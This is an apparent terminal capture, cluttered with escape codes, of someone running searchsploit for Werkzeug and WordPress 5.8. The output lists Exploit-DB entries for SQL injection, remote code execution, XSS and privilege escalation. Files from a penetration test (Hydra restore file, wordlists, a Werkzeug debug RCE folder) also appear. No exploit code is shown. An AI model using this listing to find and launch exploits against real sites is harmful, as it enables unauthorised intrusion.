#[J#[0;1;2mdirectory#[0m
#[01;34mWerkzeug-Debug-RCE#[0m/
#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m #[90mwerkzeug#[39m#[K#[118C[9:10:24]#[0m#[135D#[39mw
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mWerkzeug-Debug-RCE#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m
w#[90merkzeug#[39m#[K#[118C[9:10:24]#[0m#[134D#[39mo#[39m #[39m #[39m #[39m #[39m
#[39m ######r
#[J#[0;1;2mfile#[0m
#[J#[0mmain_wordlist.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m wor#[K#[123C[9:10:24]#[0m#[132Dk
#[J#[0;1;2mfile#[0m
#[J#[0mmain_wordlist.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m word#[K#[122C[9:10:24]#[0m#[131Dpress
#[J#[0;1;2mdirectory#[0m
#[01;34mWerkzeug-Debug-RCE#[0m/
#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m wordpress#[K#[117C[9:10:24]#[0m#[125D5.
#[J#[A#[32C
#[J#]2;searchsploit wordpress
5.8##]1;searchsploit#--------------------------------------------------------------
-----------------------------------------------------------
---------------------------------
Exploit Title
| Path
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
NEX-Forms #[01;31m#[KWordPress#[m#[K plugin < 7.9.7 - Authenticated SQLi
| php/webapps/51042.txt
#[01;31m#[KWordPress#[m#[K Core #[01;31m#[K5.8#[m#[K.2 - 'WP_Query' SQL Injection
| php/webapps/50663.txt
#[01;31m#[KWordpress#[m#[K Plugin Backup Guard 1.#[01;31m#[K5.8#[m#[K - Remote Code
Execution (Authenticated) |
php/webapps/50093.py
#[01;31m#[KWordPress#[m#[K Plugin Download Manager Free & Pro
2.#[01;31m#[K5.8#[m#[K - Persistent Cross-Site Scripting
| php/webapps/30105.txt
#[01;31m#[KWordPress#[m#[K Plugin Duplicator 0.#[01;31m#[K5.8#[m#[K - Privilege
Escalation |
php/webapps/36112.txt
#[01;31m#[KWordPress#[m#[K Plugin DZS Videogallery < 8.60 - Multiple
Vulnerabilities |
php/webapps/39553.txt
#[01;31m#[KWordPress#[m#[K Plugin Freshmail 1.#[01;31m#[K5.8#[m#[K -
'shortcode.php' SQL Injection
| php/webapps/36942.txt
#[01;31m#[KWordPress#[m#[K Plugin Freshmail 1.#[01;31m#[K5.8#[m#[K - SQL Injection
| multiple/webapps/36930.txt
#[01;31m#[KWordPress#[m#[K Plugin iThemes Security < 7.0.3 - SQL Injection
| php/webapps/44943.txt
#[01;31m#[KWordPress#[m#[K Plugin Rest Google Maps < 7.11.18 - SQL Injection
| php/webapps/48918.sh
#[01;31m#[KWordPress#[m#[K Plugin UnGallery 1.#[01;31m#[K5.8#[m#[K - Local File
Disclosure |
php/webapps/17704.txt
#[01;31m#[KWordPress#[m#[K Plugin WPForms 1.#[01;31m#[K5.8#[m#[K.2 - Persistent
Cross-Site Scripting |
php/webapps/48245.txt
-----------------------------------------------------------------------------------
-------------------------------------- --------